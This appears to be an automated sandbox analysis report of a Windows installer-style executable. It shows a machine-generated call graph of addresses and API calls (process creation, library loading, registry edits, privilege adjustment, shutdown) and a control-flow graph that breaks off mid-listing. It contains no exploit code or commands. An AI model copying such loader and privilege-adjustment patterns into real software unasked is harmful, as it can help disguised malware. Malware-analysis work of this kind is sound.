4321->4322 4324->4319 4325 4019ff 4326 402c41 17 API calls 4325->4326 4327 401a06 4326->4327 4328 402c41 17 API calls 4327->4328 4329 401a0f 4328->4329 4330 401a16 lstrcmpiW 4329->4330 4331 401a28 lstrcmpW 4329->4331 4332 401a1c 4330->4332 4331->4332 4333 401000 4334 401037 BeginPaint GetClientRect 4333->4334 4335 40100c DefWindowProcW 4333->4335 4337 4010f3 4334->4337 4338 401179 4335->4338 4339 401073 CreateBrushIndirect FillRect DeleteObject 4337->4339 4340 4010fc 4337->4340 4339->4337 4341 401102 CreateFontIndirectW 4340->4341 4342 401167 EndPaint 4340->4342 4341->4342 4343 401112 6 API calls 4341->4343 4342->4338 4343->4342 4344 401503 4345 40150b 4344->4345 4347 40151e 4344->4347 4346 402c1f 17 API calls 4345->4346 4346->4347 4348 402104 4349 402c41 17 API calls 4348->4349 4350 40210b 4349->4350 4351 402c41 17 API calls 4350->4351 4352 402115 4351->4352 4353 402c41 17 API calls 4352->4353 4354 40211f 4353->4354 4355 402c41 17 API calls 4354->4355 4356 402129 4355->4356 4357 402c41 17 API calls 4356->4357 4359 402133 4357->4359 4358 402172 CoCreateInstance 4363 402191 4358->4363 4359->4358 4360 402c41 17 API calls 4359->4360 4360->4358 4361 401423 24 API calls 4362 402250 4361->4362 4363->4361 4363->4362 4364 402484 4365 402c81 17 API calls 4364->4365 4366 40248e 4365->4366 4367 402c41 17 API calls 4366->4367 4368 402497 4367->4368 4369 4024a2 RegQueryValueExW 4368->4369 4374 40288b 4368->4374 4370 4024c8 RegCloseKey 4369->4370 4371 4024c2 4369->4371 4370->4374 4371->4370 4375 40632f wsprintfW 4371->4375 4375->4370 3756 401f06 3757 402c41 17 API calls 3756->3757 3758 401f0c 3757->3758 3759 405450 24 API calls 3758->3759 3760 401f16 3759->3760 3761 4059d1 2 API calls 3760->3761 3762 401f1c 3761->3762 3763 401f3f FindCloseChangeNotification 3762->3763 3767 40288b 3762->3767 3769 406873 WaitForSingleObject 3762->3769 3763->3767 3766 401f31 3766->3763 3774 40632f wsprintfW 3766->3774 3770 40688d 3769->3770 3771 40689f GetExitCodeProcess 3770->3771 3772 4067fe 2 API calls 3770->3772 3771->3766 3773 406894 WaitForSingleObject 3772->3773 3773->3770 3774->3763 4376 403e86 4377 403fd9 4376->4377 4378 403e9e 4376->4378 4380 403fea GetDlgItem GetDlgItem 4377->4380 4395 40402a 4377->4395 4378->4377 4379 403eaa 4378->4379 4381 403eb5 SetWindowPos 4379->4381 4382 403ec8 4379->4382 4383 40435f 18 API calls 4380->4383 4381->4382 4385 403ee5 4382->4385 4386 403ecd ShowWindow 4382->4386 4387 404014 SetClassLongW 4383->4387 4384 4043ab SendMessageW 4415 404096 4384->4415 4390 403f07 4385->4390 4391 403eed DestroyWindow 4385->4391 4386->4385 4392 40140b 2 API calls 4387->4392 4388 404084 4388->4384 4389 403fd4 4388->4389 4396 403f0c SetWindowLongW 4390->4396 4397 403f1d 4390->4397 4394 4042e8 4391->4394 4392->4395 4393 401389 2 API calls 4398 40405c 4393->4398 4394->4389 4405 404319 ShowWindow 4394->4405 4395->4388 4395->4393 4396->4389 4401 403f94 4397->4401 4402 403f29 GetDlgItem 4397->4402 4398->4388 4403 404060 SendMessageW 4398->4403 4399 40140b 2 API calls 4399->4415 4400 4042ea DestroyWindow EndDialog 4400->4394 4404 4043c6 8 API calls 4401->4404 4406 403f59 4402->4406 4407 403f3c SendMessageW IsWindowEnabled 4402->4407 4403->4389 4404->4389 4405->4389 4409 403f66 4406->4409 4410 403fad SendMessageW 4406->4410 4411 403f79 4406->4411 4419 403f5e 4406->4419 4407->4389 4407->4406 4408 40640a 17 API calls 4408->4415 4409->4410 4409->4419 4410->4401 4413 403f81 4411->4413 4414 403f96 4411->4414 4416 40140b 2 API calls 4413->4416 4417 40140b 2 API calls 4414->4417 4415->4389 4415->4399 4415->4400 4415->4408 4418 40435f 18 API calls 4415->4418 4420 40435f 18 API calls 4415->4420 4436 40422a DestroyWindow 4415->4436 4416->4419 4417->4419 4418->4415 4419->4401 4445 404338 4419->4445 4421 404111 GetDlgItem 4420->4421 4422 404126 4421->4422 4423 40412e ShowWindow EnableWindow 4421->4423 4422->4423 4448 404381 EnableWindow 4423->4448 4425 404158 EnableWindow 4430 40416c 4425->4430 4426 404171 GetSystemMenu EnableMenuItem SendMessageW 4427 4041a1 SendMessageW 4426->4427 4426->4430 4427->4430 4429 403e67 18 API calls 4429->4430 4430->4426 4430->4429 4449 404394 SendMessageW 4430->4449 4450 4063e8 lstrcpynW 4430->4450 4432 4041d0 lstrlenW 4433 40640a 17 API calls 4432->4433 4434 4041e6 SetWindowTextW 4433->4434 4435 401389 2 API calls 4434->4435 4435->4415 4436->4394 4437 404244 CreateDialogParamW 4436->4437 4437->4394 4438 404277 4437->4438 4439 40435f 18 API calls 4438->4439 4440 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4439->4440 4441 401389 2 API calls 4440->4441 4442 4042c8 4441->4442 4442->4389 4443 4042d0 ShowWindow 4442->4443 4444 4043ab SendMessageW 4443->4444 4444->4394 4446 404345 SendMessageW 4445->4446 4447 40433f 4445->4447 4446->4401 4447->4446 4448->4425 4449->4430 4450->4432 3832 401389 3834 401390 3832->3834 3833 4013fe 3834->3833 3835 4013cb MulDiv SendMessageW 3834->3835 3835->3834 4451 404809 4452 404819 4451->4452 4453 40483f 4451->4453 4454 40435f 18 API calls 4452->4454 4455 4043c6 8 API calls 4453->4455 4456 404826 SetDlgItemTextW 4454->4456 4457 40484b 4455->4457 4456->4453 4458 40190c 4459 401943 4458->4459 4460 402c41 17 API calls 4459->4460 4461 401948 4460->4461 4462 405afa 67 API calls 4461->4462 4463 401951 4462->4463 4464 40230c 4465 402314 4464->4465 4466 40231a 4464->4466 4467 402c41 17 API calls 4465->4467 4468 402c41 17 API calls 4466->4468 4470 402328 4466->4470 4467->4466 4468->4470 4469 402c41 17 API calls 4472 40233f WritePrivateProfileStringW 4469->4472 4471 402c41 17 API calls 4470->4471 4473 402336 4470->4473 4471->4473 4473->4469 4474 401f8c 4475 402c41 17 API calls 4474->4475 4476 401f93 4475->4476 4477 4067c2 5 API calls 4476->4477 4478 401fa2 4477->4478 4479 401fbe GlobalAlloc 4478->4479 4481 402026 4478->4481 4480 401fd2 4479->4480 4479->4481 4482 4067c2 5 API calls 4480->4482 4483 401fd9 4482->4483 4484 4067c2 5 API calls 4483->4484 4485 401fe3 4484->4485 4485->4481 4489 40632f wsprintfW 4485->4489 4487 402018 4490 40632f wsprintfW 4487->4490 4489->4487 4490->4481 4491 40238e 4492 4023c1 4491->4492 4493 402396 4491->4493 4495 402c41 17 API calls 4492->4495 4494 402c81 17 API calls 4493->4494 4496 40239d 4494->4496 4497 4023c8 4495->4497 4499 4023d5 4496->4499 4500 402c41 17 API calls 4496->4500 4502 402cff 4497->4502 4501 4023ae RegDeleteValueW RegCloseKey 4500->4501 4501->4499 4503 402d13 4502->4503 4504 402d0c 4502->4504 4503->4504 4506 402d44 4503->4506 4504->4499 4507 406255 RegOpenKeyExW 4506->4507 4508 402d72 4507->4508 4509 402d98 RegEnumKeyW 4508->4509 4510 402daf RegCloseKey 4508->4510 4512 402dd0 RegCloseKey 4508->4512 4514 402d44 6 API calls 4508->4514 4516 402dc3 4508->4516 4509->4508 4509->4510 4511 4067c2 5 API calls 4510->4511 4513 402dbf 4511->4513 4512->4516 4515 402de0 RegDeleteKeyW 4513->4515 4513->4516 4514->4508 4515->4516 4516->4504 4517 40190f 4518 402c41 17 API calls 4517->4518 4519 401916 4518->4519 4520 405a4e MessageBoxIndirectW 4519->4520 4521 40191f 4520->4521 4522 40558f 4523 4055b0 GetDlgItem GetDlgItem GetDlgItem 4522->4523 4524 405739 4522->4524 4567 404394 SendMessageW 4523->4567 4526 405742 GetDlgItem CreateThread CloseHandle 4524->4526 4527 40576a 4524->4527 4526->4527 4529 405795 4527->4529 4530 405781 ShowWindow ShowWindow 4527->4530 4531 4057ba 4527->4531 4528 405620 4534 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4528->4534 4532 4057f5 4529->4532 4536 4057a9 4529->4536 4537 4057cf ShowWindow 4529->4537 4569 404394 SendMessageW 4530->4569 4533 4043c6 8 API calls 4531->4533 4532->4531 4542 405803 SendMessageW 4532->4542 4548 4057c8 4533->4548 4540 405695 4534->4540 4541 405679 SendMessageW SendMessageW 4534->4541 4543 404338 SendMessageW 4536->4543 4538 4057e1 4537->4538 4539 4057ef 4537->4539 4544 405450 24 API calls 4538->4544 4545 404338 SendMessageW 4539->4545 4546 4056a8 4540->4546 4547 40569a SendMessageW 4540->4547 4541->4540 4542->4548 4549 40581c CreatePopupMenu 4542->4549 4543->4531 4544->4539 4545->4532 4551 40435f 18 API calls 4546->4551 4547->4546 4550 40640a 17 API calls 4549->4550 4552 40582c AppendMenuW 4550->4552 4553 4056b8 4551->4553 4554 405849 GetWindowRect 4552->4554 4555 40585c TrackPopupMenu 4552->4555 4556 4056c1 ShowWindow 4553->4556 4557 4056f5 GetDlgItem SendMessageW 4553->4557 4554->4555 4555->4548 4559 405877 4555->4559 4560 4056e4 4556->4560 4561 4056d7 ShowWindow 4556->4561 4557->4548 4558 40571c SendMessageW SendMessageW 4557->4558 4558->4548 4562 405893 SendMessageW 4559->4562 4568 404394 SendMessageW 4560->4568 4561->4560 4562->4562 4563 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4562->4563 4565 4058d5 SendMessageW 4563->4565 4565->4565 4566 4058fe GlobalUnlock SetClipboardData CloseClipboard 4565->4566 4566->4548 4567->4528 4568->4557 4569->4529 4570 401491 4571 405450 24 API calls 4570->4571 4572 401498 4571->4572 4580 401d14 4581 402c1f 17 API calls 4580->4581 4582 401d1b 4581->4582 4583 402c1f 17 API calls 4582->4583 4584 401d27 GetDlgItem 4583->4584 4585 402592 4584->4585 4586 404495 lstrcpynW lstrlenW 4587 403a96 4588 403aa1 4587->4588 4589 403aa5 4588->4589 4590 403aa8 GlobalAlloc 4588->4590 4590->4589 3806 402598 3807 4025c7 3806->3807 3808 4025ac 3806->3808 3810 4025fb 3807->3810 3811 4025cc 3807->3811 3809 402c1f 17 API calls 3808->3809 3816 4025b3 3809->3816 3813 402c41 17 API calls 3810->3813 3812 402c41 17 API calls 3811->3812 3814 4025d3 WideCharToMultiByte lstrlenA 3812->3814 3815 402602 lstrlenW 3813->3815 3814->3816 3815->3816 3817 402637 3816->3817 3818 402645 3816->3818 3819 402628 3816->3819 3820 405f90 WriteFile 3817->3820 3823 405fbf SetFilePointer 3819->3823 3820->3818 3824 405fdb 3823->3824 3831 40262f 3823->3831 3825 405f61 ReadFile 3824->3825 3826 405fe7 3825->3826 3827 406024 SetFilePointer 3826->3827 3828 405ffc SetFilePointer 3826->3828 3826->3831 3827->3831 3828->3827 3829 406007 3828->3829 3830 405f90 WriteFile 3829->3830 3830->3831 3831->3817 3831->3818 4591 40451e 4592 404536 4591->4592 4598 404650 4591->4598 4599 40435f 18 API calls 4592->4599 4593 4046ba 4594 404784 4593->4594 4595 4046c4 GetDlgItem 4593->4595 4600 4043c6 8 API calls 4594->4600 4596 404745 4595->4596 4597 4046de 4595->4597 4596->4594 4605 404757 4596->4605 4597->4596 4604 404704 SendMessageW LoadCursorW SetCursor 4597->4604 4598->4593 4598->4594 4601 40468b GetDlgItem SendMessageW 4598->4601 4602 40459d 4599->4602 4603 40477f 4600->4603 4624 404381 EnableWindow 4601->4624 4607 40435f 18 API calls 4602->4607 4625 4047cd 4604->4625 4610 40476d 4605->4610 4611 40475d SendMessageW 4605->4611 4608 4045aa CheckDlgButton 4607->4608 4622 404381 EnableWindow 4608->4622 4610->4603 4615 404773 SendMessageW 4610->4615 4611->4610 4612 4046b5 4616 4047a9 SendMessageW 4612->4616 4615->4603 4616->4593 4617 4045c8 GetDlgItem 4623 404394 SendMessageW 4617->4623 4619 4045de SendMessageW 4620 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4619->4620 4621 4045fb GetSysColor 4619->4621 4620->4603 4621->4620 4622->4617 4623->4619 4624->4612 4628 405a14 ShellExecuteExW 4625->4628 4627 404733 LoadCursorW SetCursor 4627->4596 4628->4627 4629 40149e 4630 4022f7 4629->4630 4631 4014ac PostQuitMessage 4629->4631 4631->4630 4632 401c1f 4633 402c1f 17 API calls 4632->4633 4634 401c26 4633->4634 4635 402c1f 17 API calls 4634->4635 4636 401c33 4635->4636 4637 401c48 4636->4637 4638 402c41 17 API calls 4636->4638 4639 401c58 4637->4639 4640 402c41 17 API calls 4637->4640 4638->4637 4641 401c63 4639->4641 4642 401caf 4639->4642 4640->4639 4644 402c1f 17 API calls 4641->4644 4643 402c41 17 API calls 4642->4643 4645 401cb4 4643->4645 4646 401c68 4644->4646 4647 402c41 17 API calls 4645->4647 4648 402c1f 17 API calls 4646->4648 4649 401cbd FindWindowExW 4647->4649 4650 401c74 4648->4650 4653 401cdf 4649->4653 4651 401c81 SendMessageTimeoutW 4650->4651 4652 401c9f SendMessageW 4650->4652 4651->4653 4652->4653 4654 402aa0 SendMessageW 4655 402ac5 4654->4655 4656 402aba InvalidateRect 4654->4656 4656->4655 4657 402821 4658 402827 4657->4658 4659 402ac5 4658->4659 4660 40282f FindClose 4658->4660 4660->4659 4661 4015a3 4662 402c41 17 API calls 4661->4662 4663 4015aa SetFileAttributesW 4662->4663 4664 4015bc 4663->4664 3441 4034a5 SetErrorMode GetVersion 3442 4034e4 3441->3442 3443 4034ea 3441->3443 3444 4067c2 5 API calls 3442->3444 3445 406752 3 API calls 3443->3445 3444->3443 3446 403500 lstrlenA 3445->3446 3446->3443 3447 403510 3446->3447 3448 4067c2 5 API calls 3447->3448 3449 403517 3448->3449 3450 4067c2 5 API calls 3449->3450 3451 40351e 3450->3451 3452 4067c2 5 API calls 3451->3452 3453 40352a #17 OleInitialize SHGetFileInfoW 3452->3453 3531 4063e8 lstrcpynW 3453->3531 3456 403576 GetCommandLineW 3532 4063e8 lstrcpynW 3456->3532 3458 403588 3459 405cea CharNextW 3458->3459 3460 4035ad CharNextW 3459->3460 3461 4036d7 GetTempPathW 3460->3461 3471 4035c6 3460->3471 3533 403474 3461->3533 3463 4036ef 3464 4036f3 GetWindowsDirectoryW lstrcatW 3463->3464 3465 403749 DeleteFileW 3463->3465 3466 403474 12 API calls 3464->3466 3543 402f30 GetTickCount GetModuleFileNameW 3465->3543 3469 40370f 3466->3469 3467 405cea CharNextW 3467->3471 3469->3465 3472 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3469->3472 3470 40375d 3473 403814 ExitProcess OleUninitialize 3470->3473 3477 403800 3470->3477 3484 405cea CharNextW 3470->3484 3471->3467 3475 4036c2 3471->3475 3476 4036c0 3471->3476 3474 403474 12 API calls 3472->3474 3478 40394a 3473->3478 3479 40382a 3473->3479 3482 403741 3474->3482 3630 4063e8 lstrcpynW 3475->3630 3476->3461 3573 403ad8 3477->3573 3480 403952 GetCurrentProcess OpenProcessToken 3478->3480 3481 4039ce ExitProcess 3478->3481 3633 405a4e 3479->3633 3488 40396a LookupPrivilegeValueW AdjustTokenPrivileges 3480->3488 3489 40399e 3480->3489 3482->3465 3482->3473 3499 40377c 3484->3499 3488->3489 3492 4067c2 5 API calls 3489->3492 3495 4039a5 3492->3495 3493 403840 3496 4059b9 5 API calls 3493->3496 3494 4037da 3497 405dc5 18 API calls 3494->3497 3498 4039ba ExitWindowsEx 3495->3498 3502 4039c7 3495->3502 3500 403845 lstrcatW 3496->3500 3501 4037e6 3497->3501 3498->3481 3498->3502 3499->3493 3499->3494 3503 403861 lstrcatW lstrcmpiW 3500->3503 3504 403856 lstrcatW 3500->3504 3501->3473 3631 4063e8 lstrcpynW 3501->3631 3642 40140b 3502->3642 3503->3473 3506 40387d 3503->3506 3504->3503 3508 403882 3506->3508 3509 403889 3506->3509 3511 40591f 4 API calls 3508->3511 3513 40599c 2 API calls 3509->3513 3510 4037f5 3632 4063e8 lstrcpynW 3510->3632 3514 403887 3511->3514 3515 40388e SetCurrentDirectoryW 3513->3515 3514->3515 3516 4038a9 3515->3516 3517 40389e 3515->3517 3638 4063e8 lstrcpynW 3516->3638 3637 4063e8 lstrcpynW 3517->3637 3520 40640a 17 API calls 3521 4038e8 DeleteFileW 3520->3521 3522 4038f5 CopyFileW 3521->3522 3528 4038b7 3521->3528 3522->3528 3523 40393e 3524 4061ae 36 API calls 3523->3524 3526 403945 3524->3526 3525 4061ae 36 API calls 3525->3528 3526->3473 3527 40640a 17 API calls 3527->3528 3528->3520 3528->3523 3528->3525 3528->3527 3530 403929 CloseHandle 3528->3530 3639 4059d1 CreateProcessW 3528->3639 3530->3528 3531->3456 3532->3458 3534 40667c 5 API calls 3533->3534 3535 403480 3534->3535 3536 40348a 3535->3536 3537 405cbd 3 API calls 3535->3537 3536->3463 3538 403492 3537->3538 3539 40599c 2 API calls 3538->3539 3540 403498 3539->3540 3645 405f0d 3540->3645 3649 405ede GetFileAttributesW CreateFileW 3543->3649 3545 402f73 3572 402f80 3545->3572 3650 4063e8 lstrcpynW 3545->3650 3547 402f96 3548 405d09 2 API calls 3547->3548 3549 402f9c 3548->3549 3651 4063e8 lstrcpynW 3549->3651 3551 402fa7 GetFileSize 3552 4030a8 3551->3552 3556 402fbe 3551->3556 3652 402e8e 3552->3652 3556->3552 3557 403143 3556->3557 3564 402e8e 32 API calls 3556->3564 3556->3572 3683 403447 3556->3683 3561 402e8e 32 API calls 3557->3561 3558 4030eb GlobalAlloc 3560 403102 3558->3560 3565 405f0d 2 API calls 3560->3565 3561->3572 3562 4030cc 3563 403447 ReadFile 3562->3563 3567 4030d7 3563->3567 3564->3556 3566 403113 CreateFileW 3565->3566 3568 40314d 3566->3568 3566->3572 3567->3558 3567->3572 3667 40345d SetFilePointer 3568->3667 3570 40315b 3668 4031d6 3570->3668 3572->3470 3572->3572 3574 4067c2 5 API calls 3573->3574 3575 403aec 3574->3575 3576 403af2 GetUserDefaultUILanguage 3575->3576 3577 403b04 3575->3577 3715 40632f wsprintfW 3576->3715 3579 4062b6 3 API calls 3577->3579 3581 403b34 3579->3581 3580 403b02 3716 403dae 3580->3716 3582 403b53 lstrcatW 3581->3582 3583 4062b6 3 API calls 3581->3583 3582->3580 3583->3582 3586 405dc5 18 API calls 3587 403b85 3586->3587 3588 403c19 3587->3588 3590 4062b6 3 API calls 3587->3590 3589 405dc5 18 API calls 3588->3589 3591 403c1f 3589->3591 3592 403bb7 3590->3592 3593 403c2f LoadImageW 3591->3593 3594 40640a 17 API calls 3591->3594 3592->3588 3597 403bd8 lstrlenW 3592->3597 3601 405cea CharNextW 3592->3601 3595 403cd5 3593->3595 3596 403c56 RegisterClassW 3593->3596 3594->3593 3600 40140b 2 API calls 3595->3600 3598 403810 3596->3598 3599 403c8c SystemParametersInfoW CreateWindowExW 3596->3599 3602 403be6 lstrcmpiW 3597->3602 3603 403c0c 3597->3603 3598->3473 3599->3595 3604 403cdb 3600->3604 3605 403bd5 3601->3605 3602->3603 3606 403bf6 GetFileAttributesW 3602->3606 3607 405cbd 3 API calls 3603->3607 3604->3598 3609 403dae 18 API calls 3604->3609 3605->3597 3608 403c02 3606->3608 3610 403c12 3607->3610 3608->3603 3612 405d09 2 API calls 3608->3612 3613 403cec 3609->3613 3724 4063e8 lstrcpynW 3610->3724 3612->3603 3614 403cf8 ShowWindow 3613->3614 3615 403d7b 3613->3615 3616 406752 3 API calls 3614->3616 3725 405523 OleInitialize 3615->3725 3618 403d10 3616->3618 3620 403d1e GetClassInfoW 3618->3620 3623 406752 3 API calls 3618->3623 3619 403d81 3621 403d85 3619->3621 3622 403d9d 3619->3622 3625 403d32 GetClassInfoW RegisterClassW 3620->3625 3626 403d48 DialogBoxParamW 3620->3626 3621->3598 3627 40140b 2 API calls 3621->3627 3624 40140b 2 API calls 3622->3624 3623->3620 3624->3598 3625->3626 3628 40140b 2 API calls 3626->3628 3627->3598 3629 403d70 3628->3629 3629->3598 3630->3476 3631->3510 3632->3477 3634 405a63 3633->3634 3635 403838 ExitProcess 3634->3635 3636 405a77 MessageBoxIndirectW 3634->3636 3636->3635 3637->3516 3638->3528 3640 405a10 3639->3640 3641 405a04 CloseHandle 3639->3641 3640->3528 3641->3640 3643 401389 2 API calls 3642->3643 3644 401420 3643->3644 3644->3481 3646 405f1a GetTickCount GetTempFileNameW 3645->3646 3647 405f50 3646->3647 3648 4034a3 3646->3648 3647->3646 3647->3648 3648->3463 3649->3545 3650->3547 3651->3551 3653 402eb7 3652->3653 3654 402e9f 3652->3654 3657 402ec7 GetTickCount 3653->3657 3658 402ebf 3653->3658 3655 402ea8 DestroyWindow 3654->3655 3656 402eaf 3654->3656 3655->3656 3656->3558 3656->3572 3686 40345d SetFilePointer 3656->3686 3657->3656 3660 402ed5 3657->3660 3687 4067fe 3658->3687 3661 402f0a CreateDialogParamW ShowWindow 3660->3661 3662 402edd 3660->3662 3661->3656 3662->3656 3691 402e72 3662->3691 3664 402eeb wsprintfW 3665 405450 24 API calls 3664->3665 3666 402f08 3665->3666 3666->3656 3667->3570 3669 403201 3668->3669 3670 4031e5 SetFilePointer 3668->3670 3694 4032de GetTickCount 3669->3694 3670->3669 3673 405f61 ReadFile 3674 403221 3673->3674 3675 4032de 42 API calls 3674->3675 3677 40329e 3674->3677 3676 403238 3675->3676 3676->3677 3678 4032a4 ReadFile 3676->3678 3680 403247 3676->3680 3677->3572 3678->3677 3680->3677 3681 405f61 ReadFile 3680->3681 3682 405f90 WriteFile 3680->3682 3681->3680 3682->3680 3684 405f61 ReadFile 3683->3684 3685 40345a 3684->3685 3685->3556 3686->3562 3688 40681b PeekMessageW 3687->3688 3689 406811 DispatchMessageW 3688->3689 3690 40682b 3688->3690 3689->3688 3690->3656 3692 402e81 3691->3692 3693 402e83 MulDiv 3691->3693 3692->3693 3693->3664 3695 403436 3694->3695 3696 40330c 3694->3696 3697 402e8e 32 API calls 3695->3697 3707 40345d SetFilePointer 3696->3707 3703 403208 3697->3703 3699 403317 SetFilePointer 3705 40333c 3699->3705 3700 403447 ReadFile 3700->3705 3702 402e8e 32 API calls 3702->3705 3703->3673 3703->3677 3704 405f90 WriteFile 3704->3705 3705->3700 3705->3702 3705->3703 3705->3704 3706 403417 SetFilePointer 3705->3706 3708 406943 3705->3708 3706->3695 3707->3699 3709 406968 3708->3709 3710 406970 3708->3710 3709->3705 3710->3709 3711 406a00 GlobalAlloc 3710->3711 3712 4069f7 GlobalFree 3710->3712 3713 406a77 GlobalAlloc 3710->3713 3714 406a6e GlobalFree 3710->3714 3711->3709 3711->3710 3712->3711 3713->3709 3713->3710 3714->3713 3715->3580 3717 403dc2 3716->3717 3732 40632f wsprintfW 3717->3732 3719 403e33 3733 403e67 3719->3733 3721 403b63 3721->3586 3722 403e38 3722->3721 3723 40640a 17 API calls 3722->3723 3723->3722 3724->3588 3736 4043ab 3725->3736 3727 405546 3731 40556d 3727->3731 3739 401389 3727->3739 3728 4043ab SendMessageW 3729 40557f OleUninitialize 3728->3729 3729->3619 3731->3728 3732->3719 3734 40640a 17 API calls 3733->3734 3735 403e75 SetWindowTextW 3734->3735 3735->3722 3737 4043c3 3736->3737 3738 4043b4 SendMessageW 3736->3738 3737->3727 3738->3737 3741 401390 3739->3741 3740 4013fe 3740->3727 3741->3740 3742 4013cb MulDiv SendMessageW 3741->3742 3742->3741 4665 404ba6 4666 404bd2 4665->4666 4667 404bb6 4665->4667 4669 404c05 4666->4669 4670 404bd8 SHGetPathFromIDListW 4666->4670 4676 405a32 GetDlgItemTextW 4667->4676 4672 404bef SendMessageW 4670->4672 4673 404be8 4670->4673 4671 404bc3 SendMessageW 4671->4666 4672->4669 4674 40140b 2 API calls 4673->4674 4674->4672 4676->4671 4691 4029a8 4692 402c1f 17 API calls 4691->4692 4693 4029ae 4692->4693 4694 4029d5 4693->4694 4695 4029ee 4693->4695 4696 40288b 4693->4696 4697 4029da 4694->4697 4704 4029eb 4694->4704 4698 402a08 4695->4698 4699 4029f8 4695->4699 4705 4063e8 lstrcpynW 4697->4705 4701 40640a 17 API calls 4698->4701 4700 402c1f 17 API calls 4699->4700 4700->4704 4701->4704 4704->4696 4706 40632f wsprintfW 4704->4706 4705->4696 4706->4696 4707 4028ad 4708 402c41 17 API calls 4707->4708 4709 4028bb 4708->4709 4710 4028d1 4709->4710 4711 402c41 17 API calls 4709->4711 4712 405eb9 2 API calls 4710->4712 4711->4710 4713 4028d7 4712->4713 4735 405ede GetFileAttributesW CreateFileW 4713->4735 4715 4028e4 4716 4028f0 GlobalAlloc 4715->4716 4717 402987 4715->4717 4718 402909 4716->4718 4719 40297e CloseHandle 4716->4719 4720 4029a2 4717->4720 4721 40298f DeleteFileW 4717->4721 4736 40345d SetFilePointer 4718->4736 4719->4717 4721->4720 4723 40290f 4724 403447 ReadFile 4723->4724 4725 402918 GlobalAlloc 4724->4725 4726 402928 4725->4726 4727 40295c 4725->4727 4729 4031d6 44 API calls 4726->4729 4728 405f90 WriteFile 4727->4728 4730 402968 GlobalFree 4728->4730 4734 402935 4729->4734 4731 4031d6 44 API calls 4730->4731 4732 40297b 4731->4732 4732->4719 4733 402953 GlobalFree 4733->4727 4734->4733 4735->4715 4736->4723 4744 401a30 4745 402c41 17 API calls 4744->4745 4746 401a39 ExpandEnvironmentStringsW 4745->4746 4747 401a60 4746->4747 4748 401a4d 4746->4748 4748->4747 4749 401a52 lstrcmpW 4748->4749 4749->4747 3418 402032 3419 402044 3418->3419 3420 4020f6 3418->3420 3421 402c41 17 API calls 3419->3421 3422 401423 24 API calls 3420->3422 3423 40204b 3421->3423 3429 402250 3422->3429 3424 402c41 17 API calls 3423->3424 3425 402054 3424->3425 3426 40206a LoadLibraryExW 3425->3426 3427 40205c GetModuleHandleW 3425->3427 3426->3420 3428 40207b 3426->3428 3427->3426 3427->3428 3438 406831 WideCharToMultiByte 3428->3438 3432 4020c5 3434 405450 24 API calls 3432->3434 3433 40208c 3435 401423 24 API calls 3433->3435 3436 40209c 3433->3436 3434->3436 3435->3436 3436->3429 3437 4020e8 FreeLibrary 3436->3437 3437->3429 3439 40685b GetProcAddress 3438->3439 3440 402086 3438->3440 3439->3440 3440->3432 3440->3433 4755 401735 4756 402c41 17 API calls 4755->4756 4757 40173c SearchPathW 4756->4757 4758 401757 4757->4758 4759 402a35 4760 402c1f 17 API calls 4759->4760 4761 402a3b 4760->4761 4762 402a72 4761->4762 4764 40288b 4761->4764 4765 402a4d 4761->4765 4763 40640a 17 API calls 4762->4763 4762->4764 4763->4764 4765->4764 4767 40632f wsprintfW 4765->4767 4767->4764 4768 4014b8 4769 4014be 4768->4769 4770 401389 2 API calls 4769->4770 4771 4014c6 4770->4771 4772 401db9 GetDC 4773 402c1f 17 API calls 4772->4773 4774 401dcb GetDeviceCaps MulDiv ReleaseDC 4773->4774 4775 402c1f 17 API calls 4774->4775 4776 401dfc 4775->4776 4777 40640a 17 API calls 4776->4777 4778 401e39 CreateFontIndirectW 4777->4778 4779 402592 4778->4779 4780 40283b 4781 402843 4780->4781 4782 402847 FindNextFileW 4781->4782 4785 402859 4781->4785 4783 4028a0 4782->4783 4782->4785 4786 4063e8 lstrcpynW 4783->4786 4786->4785

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 004034A5 Relevance: 80.9, APIs: 33, Strings: 13, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 43 4035f2-4035fa 37->43 44 40360b-403644 37->44 38->39 52 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->52 56 403814-403824 ExitProcess OleUninitialize 39->56 57 403769-40376f 39->57 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->36 53 40369d-4036a1 50->53 51->50 58 40364d-403655 51->58 52->39 52->56 53->36 60 4036c2-4036d0 call 4063e8 53->60 54->55 55->28 61 4036c0 55->61 64 40394a-403950 56->64 65 40382a-40383a call 405a4e ExitProcess 56->65 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 66 403657-40365a 58->66 67 40365c 58->67 71 4036d5 60->71 61->71 80 403810 62->80 84 403782-4037b7 63->84 85 4037ce-4037d8 63->85 68 403952-403968 GetCurrentProcess OpenProcessToken 64->68 69 4039ce-4039d6 64->69 66->50 66->67 67->50 77 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 68->77 78 40399e-4039ac 